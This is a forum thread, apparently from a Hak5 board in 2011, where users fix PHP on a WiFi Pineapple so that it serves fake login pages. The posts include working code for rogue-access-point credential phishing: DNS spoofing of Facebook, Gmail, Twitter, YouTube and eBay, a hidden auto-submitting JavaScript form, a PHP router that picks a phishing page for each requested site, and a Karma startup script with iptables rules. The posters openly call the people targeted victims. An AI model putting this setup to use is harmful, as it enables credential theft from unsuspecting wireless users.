billyblaxsta Posted June 20, 2011 Share Posted June 20, 2011 Hello, I am having the same php problems as a few other forum users so I wanted to provide a detailed analysis of the problem. Hopefully someone more knowledgeable can help. I installed php using opkg and tested that a php file loads in Firefox which it does. I added *.php:/usr/bin/php to httpd.conf (on the Fon) and added cgi.force_redirect=0 to php.ini (the = sign is not in the instructions at http://hak5.org/hack/pineapple-phishing but is necessary otherwise the browser tries to download the php file rather than executing it). I create dnsmasq.conf and edit it to show /#/192.168.1.1 Here is what should happen: Client enters any URL ---> dnsmasq forwards them to 192.168.1.1 ---> the index.html file in /www issues a redirection to /www/redirect.php (code below) ---> the template for the specific redirected sites should load. Redirect.php is: <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } require('peets.html'); ?> AIUI the server URL reference is checked by strpos. If the word "facebook" is in the URL then the user is forwarded to facebook.html; otherwise the user is forwarded to peets.html. The problem is that all websites forward to peets.html including facebook.com. My edited HTTP headers show: http://www.facebook.com/ GET / HTTP/1.1 Host: www.facebook.com HTTP/1.0 200 OK ---------------------------------------------------------- http://www.facebook.com/redirect.php GET /redirect.php HTTP/1.1 Host: www.facebook.com HTTP/1.0 200 OK X-Powered-By: PHP/4.4.7 Content-Type: text/html ---------------------------------------------------------- http://www.facebook.com/peets_files/lhm.css GET /peets_files/lhm.css HTTP/1.1 Host: www.facebook.com Referer: http://www.facebook.com/redirect.php www.facebook.com/redirect.php should redirect to facebook.html but, as we can see, it redirects to peets.html. Why? Thanks for the help! Quote Link to comment Share on other sites More sharing options...
digininja Posted June 21, 2011 Share Posted June 21, 2011 you need an exit after the header line otherwise the php script keeps running and outputs all the rest of its contents. Quote Link to comment Share on other sites More sharing options...
UnDeFiNeD Posted June 21, 2011 Share Posted June 21, 2011 you need an exit after the header line otherwise the php script keeps running and outputs all the rest of its contents. Or simply put else require('peets.html'); so it is part of the conditional :) <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } else { require('peets.html'); } ?> Quote Link to comment Share on other sites More sharing options...
digininja Posted June 21, 2011 Share Posted June 21, 2011 I'd still add an exit after the header just to for completeness. Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 I'd still add an exit after the header just to for completeness. I have tried various versions but everything (including facebook.com) redirects to peets.html whereas anything with 'facebook' in the URL should redirect to facebook.html First I tried Darren's version: <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); exit; } require('peets.html'); ?> The I tried the same version but with HTTP_HOST rather than HTTP_REFERER. Then I tried using 'exit' as follows for both HTTP_HOST AND HTTP_REFERER. <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); exit; } require('peets.html'); ?> Any more suggestions? Thanks! Quote Link to comment Share on other sites More sharing options...
Binaries Posted June 22, 2011 Share Posted June 22, 2011 There's the off chance you might have a "Boolean FALSE" being returned. There's a few ways to counter this but i recommend using preg_match instead. Try this: <?php $ref = $_SERVER['HTTP_HOST']; if (preg_match('/facebook/', $ref)) { header('Location: facebook.html'); exit; } require('peets.html'); ?> http://php.net/manual/en/function.strpos.php Checkout the return value on strpos. This happens because it finds the value 'facebook' within the first position (0). A good way to counter it would of been doing something like this: <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, 'facebook') !== FALSE) { header('Location: facebook.html'); exit; } require('peets.html'); ?> Quote Link to comment Share on other sites More sharing options...
digininja Posted June 22, 2011 Share Posted June 22, 2011 I did think of that when I wrote the example but managed to forget it before hitting post Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 There's the off chance you might have a "Boolean FALSE" being returned. There's a few ways to counter this but i recommend using preg_match instead. Try this: <?php $ref = $_SERVER['HTTP_HOST']; if (preg_match('/facebook/', $ref)) { header('Location: facebook.html'); exit; } require('peets.html'); ?> http://php.net/manual/en/function.strpos.php Checkout the return value on strpos. This happens because it finds the value 'facebook' within the first position (0). A good way to counter it would of been doing something like this: <?php $ref = $_SERVER['HTTP_HOST']; if (strpos($ref, 'facebook') !== FALSE) { header('Location: facebook.html'); exit; } require('peets.html'); ?> I'm afraid the preg_match idea provides: Fatal error: Call to undefined function: preg_match() in /www/redirect.php on line 5 And the second code with !== FALSE redirects all traffic to peets.html as before. I am wondering whether the problem is that because index.html sends all traffic to redirect.php that when facebook.com is entered, the redirect.php script "sees" the index.html rather than the facebook.com and so quite correctly forwards the user to peets.html. Also: are we sure that HTTP_POST always forwards the referrer for all browsers (I am using Firefox 3.6). Any other php ideas? Thanks as always! Quote Link to comment Share on other sites More sharing options...
digininja Posted June 22, 2011 Share Posted June 22, 2011 HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL. Try this: <pre> <?php $ref = $_SERVER['HTTP_HOST']; var_dump ($ref); ?> and tell us what is displayed Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 HTTP_HOST is nothing to do with the referrer, it is the domain name from the URL. Try this: <pre> <?php $ref = $_SERVER['HTTP_HOST']; var_dump ($ref); ?> and tell us what is displayed I connected to the Fon and typed www.randomsite.com/code.php As you may have assumed it provided a "NULL" output. Quote Link to comment Share on other sites More sharing options...
digininja Posted June 22, 2011 Share Posted June 22, 2011 Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that? Only other thing to try is: <? phpinfo(); ?> and post the output from that. Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that? Only other thing to try is: <? phpinfo(); ?> and post the output from that. I am using $_SERVER - I copied and pasted your code. The new code above just loaded a blank page but <?php phpinfo(); ?> loads the page for php 4.4.7. Quote Link to comment Share on other sites More sharing options...
UnDeFiNeD Posted June 22, 2011 Share Posted June 22, 2011 (edited) I think he meant for you to post the output of that script Also, I'm not a php expert, but maybe try: <?php $ref = $_SERVER['HTTP_HOST']; $ref2 = getenv('HTTP_HOST'); var_dump ($ref); var_dump ($ref2); ?> Edited June 22, 2011 by UnDeFiNeD Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 Thats wrong, that value should be populated. Are you definitely using $_SERVER and not $SERVER or something like that? Only other thing to try is: <? phpinfo(); ?> and post the output from that. I assume you mean the output of php version 4.4.7. PHP Version 4.4.7 System Linux OpenWrt 2.6.26.5 #20 Sun May 3 13:07:35 BST 2009 mips Build Date Dec 6 2009 02:47:47 Configure Command './configure' '--target=mips-linux' '--host=mips-linux' '--build=x86_64-linux-gnu' '--program-prefix=' '--program-suffix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--libexecdir=/usr/lib' '--sysconfdir=/etc' '--datadir=/usr/share' '--localstatedir=/var' '--mandir=/usr/man' '--infodir=/usr/info' '--disable-nls' '--enable-shared' '--disable-static' '--disable-rpath' '--disable-debug' '--without-pear' '--with-config-file-path=/etc' '--disable-ipv6' '--enable-magic-quotes' '--enable-memory-limit' '--disable-overload' '--disable-short-tags' '--disable-ctype' '--disable-dom' '--enable-ftp=shared' '--without-gettext' '--without-iconv' '--disable-mbstring' '--disable-mbregex' '--with-openssl=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-kerberos=no' '--with-openssl-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--enable-session=shared' '--enable-sockets=shared' '--disable-tokenizer' '--with-zlib=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-zlib-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-curl=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-gd=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--without-freetype-dir' '--with-jpeg-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-png-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--without-xpm-dir' '--without-ttf' '--without-t1lib' '--enable-gd-native-ttf' '--disable-gd-jis-conv' '--with-gmp=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-ldap=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-mysql=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-pcre-regex=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--with-pgsql=shared,/home/agb/openwrt/atheros/staging_dir/mips/usr' '--enable-xml=shared' '--with-expat-dir=/home/agb/openwrt/atheros/staging_dir/mips/usr' '--disable-cli' '--enable-cgi' '--disable-fastcgi' '--enable-force-cgi-redirect' '--enable-discard-path' Server API CGI Virtual Directory Support disabled Configuration File (php.ini) Path /etc/php.ini PHP API 20020918 PHP Extension 20020429 Zend Extension 20050606 Debug Build no Zend Memory Manager enabled Thread Safety disabled Registered PHP Streams php, http, ftp, compress.zlib Zend logo This program makes use of the Zend Scripting Language Engine: Zend Engine v1.3.0, Copyright © 1998-2004 Zend Technologies PHP Credits Configuration PHP Core Directive Local Value Master Value allow_call_time_pass_reference On On allow_url_fopen On On always_populate_raw_post_data Off Off arg_separator.input & & arg_separator.output & & asp_tags Off Off auto_append_file no value no value auto_prepend_file no value no value browscap no value no value default_charset no value no value default_mimetype text/html text/html define_syslog_variables Off Off disable_classes no value no value disable_functions no value no value display_errors On On display_startup_errors Off Off doc_root /www /www docref_ext no value no value docref_root no value no value enable_dl On On error_append_string no value no value error_log no value no value error_prepend_string no value no value error_reporting 2039 2039 expose_php On On extension_dir /usr/lib/php /usr/lib/php file_uploads On On gpc_order GPC GPC highlight.bg #FFFFFF #FFFFFF highlight.comment #FF8000 #FF8000 highlight.default #0000BB #0000BB highlight.html #000000 #000000 highlight.keyword #007700 #007700 highlight.string #DD0000 #DD0000 html_errors On On ignore_repeated_errors Off Off ignore_repeated_source Off Off ignore_user_abort Off Off implicit_flush Off Off include_path .: .: log_errors Off Off log_errors_max_len 1024 1024 magic_quotes_gpc On On magic_quotes_runtime Off Off magic_quotes_sybase Off Off max_execution_time 30 30 max_input_time 60 60 memory_limit 8M 8M open_basedir no value no value output_buffering no value no value output_handler no value no value post_max_size 8M 8M precision 12 12 register_argc_argv On On register_globals Off Off report_memleaks On On safe_mode Off Off safe_mode_exec_dir no value no value safe_mode_gid Off Off safe_mode_include_dir no value no value sendmail_from no value no value sendmail_path -t -i -t -i serialize_precision 100 100 short_open_tag Off Off SMTP localhost localhost smtp_port 25 25 sql.safe_mode Off Off track_errors Off Off unserialize_callback_func no value no value upload_max_filesize 2M 2M upload_tmp_dir /tmp /tmp user_dir no value no value variables_order EGPCS EGPCS xmlrpc_error_number 0 0 xmlrpc_errors Off Off y2k_compliance On On posix Revision $Revision: 1.51.2.4.2.3 $ standard Regex Library Bundled library enabled Dynamic Library Support enabled Directive Local Value Master Value assert.active 1 1 assert.bail 0 0 assert.callback no value no value assert.quiet_eval 0 0 assert.warning 1 1 auto_detect_line_endings 0 0 default_socket_timeout 60 60 safe_mode_allowed_env_vars PHP_ PHP_ safe_mode_protected_env_vars LD_LIBRARY_PATH LD_LIBRARY_PATH url_rewriter.tags a=href,area=href,frame=src,input=src,form=,fieldset= a=href,area=href,frame=src,input=src,form=,fieldset= user_agent no value no value zlib ZLib Support enabled Compiled Version 1.2.3 Linked Version 1.2.3 Directive Local Value Master Value zlib.output_compression Off Off zlib.output_compression_level -1 -1 zlib.output_handler no value no value Additional Modules Module Name Environment Variable Value USER root CONFIG_cfg02f02f_timezone UTC CONFIG_cfg024e53_port 80 HOME / CONFIG_cfg04315a_handler logger reboot c_file no value realm OpenWrt CONFIG_cfg024e53_home /www CONFIG_cfg0638e0_handler logger factory default TERM vt102 CONFIG_cfg04315a_button reset CONFIG_NUM_SECTIONS 1 PATH /sbin:/usr/sbin:/bin:/usr/bin home /www port 80 CONFIG_cfg04315a_TYPE button CONFIG_cfg04315a_min 0 CONFIG_cfg0638e0_button reset SHELL /bin/sh CONFIG_cfg04315a_max 4 CONFIG_cfg04315a_action released CONFIG_cfg024e53_TYPE httpd CONFIG_cfg02f02f_hostname OpenWrt args -p 80 -h "/www" -r "OpenWrt" hostname OpenWrt CONFIG_cfg0638e0_TYPE button CONFIG_SECTION cfg024e53 PWD / CONFIG_cfg0638e0_min 5 CONFIG_cfg02f02f_TYPE system CONFIG_cfg0638e0_max 30 CONFIG_cfg0638e0_action released cfgtype httpd CONFIG_SECTIONS cfg024e53 PATH_INFO no value REQUEST_METHOD GET REQUEST_URI /test.php SCRIPT_FILENAME /www/test.php SCRIPT_NAME /test.php QUERY_STRING no value SERVER_SOFTWARE busybox httpd/1.11.2 SERVER_PROTOCOL HTTP/1.0 GATEWAY_INTERFACE CGI/1.1 REMOTE_ADDR 192.168.1.234 REMOTE_PORT 35638 HTTP_USER_AGENT Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17 HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5 ORIG_PATH_INFO no value ORIG_SCRIPT_NAME /test.php ORIG_SCRIPT_FILENAME /www/test.php DOCUMENT_ROOT /www PATH_TRANSLATED no value PHP Variables Variable Value _SERVER["USER"] root _SERVER["CONFIG_cfg02f02f_timezone"] UTC _SERVER["CONFIG_cfg024e53_port"] 80 _SERVER["HOME"] / _SERVER["CONFIG_cfg04315a_handler"] logger reboot _SERVER["c_file"] no value _SERVER["realm"] OpenWrt _SERVER["CONFIG_cfg024e53_home"] /www _SERVER["CONFIG_cfg0638e0_handler"] logger factory default _SERVER["TERM"] vt102 _SERVER["CONFIG_cfg04315a_button"] reset _SERVER["CONFIG_NUM_SECTIONS"] 1 _SERVER["PATH"] /sbin:/usr/sbin:/bin:/usr/bin _SERVER["home"] /www _SERVER["port"] 80 _SERVER["CONFIG_cfg04315a_TYPE"] button _SERVER["CONFIG_cfg04315a_min"] 0 _SERVER["CONFIG_cfg0638e0_button"] reset _SERVER["SHELL"] /bin/sh _SERVER["CONFIG_cfg04315a_max"] 4 _SERVER["CONFIG_cfg04315a_action"] released _SERVER["CONFIG_cfg024e53_TYPE"] httpd _SERVER["CONFIG_cfg02f02f_hostname"] OpenWrt _SERVER["args"] -p 80 -h \"/www\" -r \"OpenWrt\" _SERVER["hostname"] OpenWrt _SERVER["CONFIG_cfg0638e0_TYPE"] button _SERVER["CONFIG_SECTION"] cfg024e53 _SERVER["PWD"] / _SERVER["CONFIG_cfg0638e0_min"] 5 _SERVER["CONFIG_cfg02f02f_TYPE"] system _SERVER["CONFIG_cfg0638e0_max"] 30 _SERVER["CONFIG_cfg0638e0_action"] released _SERVER["cfgtype"] httpd _SERVER["CONFIG_SECTIONS"] cfg024e53 _SERVER["PATH_INFO"] no value _SERVER["REQUEST_METHOD"] GET _SERVER["REQUEST_URI"] /test.php _SERVER["SCRIPT_FILENAME"] /www/test.php _SERVER["SCRIPT_NAME"] /test.php _SERVER["QUERY_STRING"] no value _SERVER["SERVER_SOFTWARE"] busybox httpd/1.11.2 _SERVER["SERVER_PROTOCOL"] HTTP/1.0 _SERVER["GATEWAY_INTERFACE"] CGI/1.1 _SERVER["REMOTE_ADDR"] 192.168.1.234 _SERVER["REMOTE_PORT"] 35638 _SERVER["HTTP_USER_AGENT"] Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17 _SERVER["HTTP_ACCEPT"] text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 _SERVER["HTTP_ACCEPT_LANGUAGE"] en-us,en;q=0.5 _SERVER["ORIG_PATH_INFO"] no value _SERVER["ORIG_SCRIPT_NAME"] /test.php _SERVER["ORIG_SCRIPT_FILENAME"] /www/test.php _SERVER["DOCUMENT_ROOT"] /www _SERVER["PATH_TRANSLATED"] no value _SERVER["PHP_SELF"] /test.php _SERVER["argv"] Array ( ) _SERVER["argc"] 0 _ENV["USER"] root _ENV["CONFIG_cfg02f02f_timezone"] UTC _ENV["CONFIG_cfg024e53_port"] 80 _ENV["HOME"] / _ENV["CONFIG_cfg04315a_handler"] logger reboot _ENV["c_file"] no value _ENV["realm"] OpenWrt _ENV["CONFIG_cfg024e53_home"] /www _ENV["CONFIG_cfg0638e0_handler"] logger factory default _ENV["TERM"] vt102 _ENV["CONFIG_cfg04315a_button"] reset _ENV["CONFIG_NUM_SECTIONS"] 1 _ENV["PATH"] /sbin:/usr/sbin:/bin:/usr/bin _ENV["home"] /www _ENV["port"] 80 _ENV["CONFIG_cfg04315a_TYPE"] button _ENV["CONFIG_cfg04315a_min"] 0 _ENV["CONFIG_cfg0638e0_button"] reset _ENV["SHELL"] /bin/sh _ENV["CONFIG_cfg04315a_max"] 4 _ENV["CONFIG_cfg04315a_action"] released _ENV["CONFIG_cfg024e53_TYPE"] httpd _ENV["CONFIG_cfg02f02f_hostname"] OpenWrt _ENV["args"] -p 80 -h \"/www\" -r \"OpenWrt\" _ENV["hostname"] OpenWrt _ENV["CONFIG_cfg0638e0_TYPE"] button _ENV["CONFIG_SECTION"] cfg024e53 _ENV["PWD"] / _ENV["CONFIG_cfg0638e0_min"] 5 _ENV["CONFIG_cfg02f02f_TYPE"] system _ENV["CONFIG_cfg0638e0_max"] 30 _ENV["CONFIG_cfg0638e0_action"] released _ENV["cfgtype"] httpd _ENV["CONFIG_SECTIONS"] cfg024e53 _ENV["PATH_INFO"] no value _ENV["REQUEST_METHOD"] GET _ENV["REQUEST_URI"] /test.php _ENV["SCRIPT_FILENAME"] /www/test.php _ENV["SCRIPT_NAME"] /test.php _ENV["QUERY_STRING"] no value _ENV["SERVER_SOFTWARE"] busybox httpd/1.11.2 _ENV["SERVER_PROTOCOL"] HTTP/1.0 _ENV["GATEWAY_INTERFACE"] CGI/1.1 _ENV["REMOTE_ADDR"] 192.168.1.234 _ENV["REMOTE_PORT"] 35638 _ENV["HTTP_USER_AGENT"] Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.17) Gecko/20110422 Ubuntu/10.04 (lucid) Firefox/3.6.17 _ENV["HTTP_ACCEPT"] text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 _ENV["HTTP_ACCEPT_LANGUAGE"] en-us,en;q=0.5 _ENV["ORIG_PATH_INFO"] no value _ENV["ORIG_SCRIPT_NAME"] /test.php _ENV["ORIG_SCRIPT_FILENAME"] /www/test.php _ENV["DOCUMENT_ROOT"] /www _ENV["PATH_TRANSLATED"] no value Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 I think he meant for you to post the output of that script Also, I'm not a php expert, but maybe try: <?php $ref = $_SERVER['HTTP_HOST']; $ref2 = getenv('HTTP_HOST'); var_dump ($ref); var_dump ($ref2); ?> Output: NULL bool(false) Quote Link to comment Share on other sites More sharing options...
digininja Posted June 22, 2011 Share Posted June 22, 2011 what URL did you use to get that page? Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 (edited) what URL did you use to get that page? I connected the Fon to eth0 then typed www.anysitewhatsoever.com/test.php where test.php runs the code: <?php phpinfo(); ?> test.php is of course in /www. I can use any site because of the dnsmasq.conf address=/#/192.168.1.1 In http://hak5.org/hack/auto-rickrolling-wifi-pineapple Darren uses <?php phpinfo(); ?> just to check that PHP is installed correctly. Should I have done something else? Thanks again. Edited June 22, 2011 by billyblaxsta Quote Link to comment Share on other sites More sharing options...
digininja Posted June 22, 2011 Share Posted June 22, 2011 I don't understand what is going on, the domain name should be passed through to a _SERVER variable but doesn't appear to be. Anyone else got any idea why this is failing as I'm out of ideas. Quote Link to comment Share on other sites More sharing options...
UnDeFiNeD Posted June 22, 2011 Share Posted June 22, 2011 (edited) It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol) I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled... index.html <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them) <?php error_reporting(0); $ref = $_POST['host']; if (strpos($ref, "facebook.com")) { include('facebook.html'); } else if (strpos($ref, "twitter.com")) { include('twitter.html'); } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) { include('gmail.html'); } else if (strpos($ref, "yahoo.com")) { include('yahoo.html'); } else if (strpos($ref, "youtube.com")) { include('youtube.html'); } else { include('peets.html'); } ?> Edited June 22, 2011 by UnDeFiNeD Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 22, 2011 Author Share Posted June 22, 2011 It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol) I'll look at your code shortly thanks but just a thought: If HTTP_HOST isn't set might not variables like HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED_HOST, and HTTP_X_FORWARDED_SERVER work instead? Or, maybe download a PHP version which does use the HTTP_HOST variable? Quote Link to comment Share on other sites More sharing options...
Binaries Posted June 23, 2011 Share Posted June 23, 2011 I've run into the same issue, just looks like the $_SERVER variable doesn't have the item set. Very odd I must say. Looking into it though. Quote Link to comment Share on other sites More sharing options...
billyblaxsta Posted June 23, 2011 Author Share Posted June 23, 2011 It looks like the "HTTP_HOST" variable isnt set by either this version of php or by the server (or whatever sets it lol) I threw together a quick rough fix for you though. I say rough because the victims will need to have javascript enabled... index.html <html> <head> </head> <body> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" value=""/> </form> <script type="text/javascript"> document.theform.host.setAttribute("value",window.location); document.theform.submit(); </script> </body> </html> index.php (named it index.php because it doesnt redirect, it displays the contents of the phishing pages instead of redirecting to them) <?php error_reporting(0); $ref = $_POST['host']; if (strpos($ref, "facebook.com")) { include('facebook.html'); } else if (strpos($ref, "twitter.com")) { include('twitter.html'); } else if (strpos($ref, "gmail.com") || strpos($ref, "mail.google.com")) { include('gmail.html'); } else if (strpos($ref, "yahoo.com")) { include('yahoo.html'); } else if (strpos($ref, "youtube.com")) { include('youtube.html'); } else { include('peets.html'); } ?> Thanks - that worked a treat. Much appreciated! And thanks also to Robin for all your help. Quote Link to comment Share on other sites More sharing options...
Binaries Posted June 23, 2011 Share Posted June 23, 2011 Seems as though it's based on the browser setting the referrer. If the browser doesn't support it or has refferer settings disabled it's not going to be available, the JS method is a good fallback though. Quote Link to comment Share on other sites More sharing options...
Thermostaten Posted July 20, 2011 Share Posted July 20, 2011 This is how i did it.. root@router:/# cat /etc/config/httpd config 'httpd' option 'port' '1338' option 'home' '/www' config 'httpd' option 'port' '80' option 'home' '/wwwguest' root@router:/# cat /etc/hosts #---------------------------------------- # Local #---------------------------------------- 127.0.0.1 localhost. 10.1.0.2 router jasager #---------------------------------------- # Gateway and services #---------------------------------------- 10.1.0.1 gateway 78.24.191.177 downloads.openwrt.org 46.4.11.11 downloads.x-wrt.org #---------------------------------------- # Phishing #---------------------------------------- 10.1.0.2 www.facebook.com facebook.com 10.1.0.2 www.facebook.dk facebook.dk 10.1.0.2 da-dk.facebook.com #---------------------------------------- 10.1.0.2 www.twitter.com twitter.com 10.1.0.2 www.twitter.dk twitter.dk #---------------------------------------- 10.1.0.2 www.gmail.dk gmail.dk 10.1.0.2 www.gmail.com gmail.com 10.1.0.2 mail.google.com 10.1.0.2 mail.google.dk #---------------------------------------- #10.1.0.2 plus.google.com plus.google.dk #---------------------------------------- 10.1.0.2 www.youtube.com youtube.com #---------------------------------------- 10.1.0.2 www.ebay.com ebay.com #---------------------------------------- #10.1.0.2 www.yahoo.com yahoo.com #---------------------------------------- #10.1.0.2 www.linkedin.com linkedin.com #---------------------------------------- root@router:/# cat /etc/php.ini |egrep www|cgi.force_redirect doc_root = /wwwguest cgi.force_redirect = 0 [code]root@router:/# cat /wwwguest/index.html <html><head></head><body> <div id="hideme"> <form action="index.php" method="POST" name="theform"> <input type="text" name="host" style="width:0px;" value="" type="hidden"/> </form> </div> <script type="text/javascript"> document.getElementById('hideme').style.display='none'; function left(str,n){ if (n <= 0) return ""; else if (n > String(str).length) return str; else return String(str).substring(0,n); } function right(str,n){ if (n <= 0) return ""; else if (n > String(str).length) return str; else { var iLen = String(str).length; return String(str).substring(iLen,iLen-n); } } var the_url = window.location.href; var the_url_len = the_url.length-7; the_url = right(the_url,the_url_len) var where_is_slash=the_url.indexOf('/'); the_url = left(the_url,where_is_slash); document.theform.host.setAttribute("value","http://"+the_url); document.theform.submit(); </script> </body> </html> root@router:/# cat /wwwguest/index.php <?php error_reporting(0); $ref = strtolower ( $_POST['host'] ); //$header = str_replace("http://", "https://", $ref); //header ("Location: $header/index.php"); if ("$ref" != "") { if (strpos($ref,"facebook.com")||strpos($ref,"www.facebook.com")||strpos($ref,"facebook.dk")||strpos($ref,"www.facebook.com.")){include('facebook.html');} else if (strpos($ref,"gmail.com")||strpos($ref,"www.gmail.com")||strpos($ref,"gmail.dk")||strpos($ref,"www.gmail.dk")||strpos($ref,"mail.google")){include('gmail.html');} else if (strpos($ref,"twitter.com")||strpos($ref,"www.twitter.com")){include('twitter.html');} else if (strpos($ref,"youtube.com")||strpos($ref,"www.youtube.com")){include('youtube.html');} else if (strpos($ref,"ebay.com")||strpos($ref,"www.ebay.com")){include('ebay.html');} else {include('peets.html');} } else { echo '<html><head>'; echo "<meta http-equiv=\"REFRESH\" content=\"0;url=/index.html\">"; echo '</head><body></body></html>'; } ?> root@router:/etc/init.d# cat /etc/init.d/jasager #!/bin/sh /etc/rc.common # Copyright (C) 2008 dninja@gmail.com START=50 start() { include /lib/network scan_interfaces /karma/bin/create_option_list.rb [ -d /karma/www -a -f /karma/etc/httpd.conf ] && httpd -p 1337 -h /karma/www -r karma -c /karma/etc/httpd.conf # ORIGINAL iptables -I FORWARD -i ath0 -o br-lan -j ACCEPT #------------------------------------------------------------------------------- # PREPARE KARMA #------------------------------------------------------------------------------- iwpriv ath0 maccmd 3; sleep 1 # Clear the MAC ignore list iwpriv ath0 maccmd 2; sleep 1 # To make the list a blacklist. # iwpriv ath0 maccmd 1; sleep 1 # To make the list a whitelist. iwpriv ath0 addmac 00:12:34:13:37:12; sleep 1 # Ignore backtrack wifi interface # iwpriv ath0 addkarmassid "Free Internet"; sleep 1 # Ignore my wifi does not work :( iwpriv ath0 karma 1; sleep 1 # Start karma ifconfig ath0 up; sleep 1 # Activate ath0 interface #------------------------------------------------------------------------------- # IPTABLES VARIABLES #------------------------------------------------------------------------------- IPT='/usr/sbin/iptables' GATEWAY="10.1.0.1" # To the internet ( my thinkpad ) JASAGER="10.1.0.2" # To the targets #------------------------------------------------------------------------------- # REMOVE ALL IPTABLES RULES #------------------------------------------------------------------------------- # reset the default policies in the filter table. $IPT -P INPUT ACCEPT $IPT -P FORWARD ACCEPT $IPT -P OUTPUT ACCEPT # reset the default policies in the nat table. $IPT -t nat -P PREROUTING ACCEPT $IPT -t nat -P POSTROUTING ACCEPT $IPT -t nat -P OUTPUT ACCEPT # reset the default policies in the mangle table. $IPT -t mangle -P PREROUTING ACCEPT $IPT -t mangle -P POSTROUTING ACCEPT $IPT -t mangle -P INPUT ACCEPT $IPT -t mangle -P OUTPUT ACCEPT $IPT -t mangle -P FORWARD ACCEPT # flush all the rules in the filter and nat tables. $IPT -F $IPT -t nat -F $IPT -t mangle -F # erase all chains that's not default in filter and nat table. $IPT -X $IPT -t nat -X $IPT -t mangle -X #------------------------------------------------------------------------------- # Allow localhost #------------------------------------------------------------------------------- $IPT -A INPUT -s 127.0.0.0/8 -i lo -j ACCEPT $IPT -A OUTPUT -s 127.0.0.0/8 -o lo -j ACCEPT #------------------------------------------------------------------------------- # Allow DNS #------------------------------------------------------------------------------- $IPT -A INPUT -i br-lan -d ${JASAGER} -m udp -p udp --dport 53 -j ACCEPT $IPT -A INPUT -i br-lan -d ${JASAGER} -m tcp -p tcp --dport 53 -j ACCEPT #------------------------------------------------------------------------------- # BLOCK STUFF #------------------------------------------------------------------------------- $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --syn -j DROP # Block SYN $IPT -A INPUT -i eth0 -d ${JASAGER} -f -j DROP # Block Fragments # Block NMAP Scans: $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL ALL -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL NONE -j DROP # NULL $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP # $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP # XMAS $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN $IPT -A INPUT -i eth0 -d ${JASAGER} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP # $IPT -A INPUT -d ${JASAGER} -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT # OK for http requests #------------------------------------------------------------------------------- # iptables -A INPUT -m limit --limit 15/minute -j LOG --log-level 7 --log-prefix "Dropped by firewall:" $IPT -A INPUT -s ! ${GATEWAY} -d ${JASAGER} -m state --state NEW -j DROP # NEW only from Gateway #------------------------------------------------------------------------------- /usr/sbin/iwconfig ath0 txpower 18 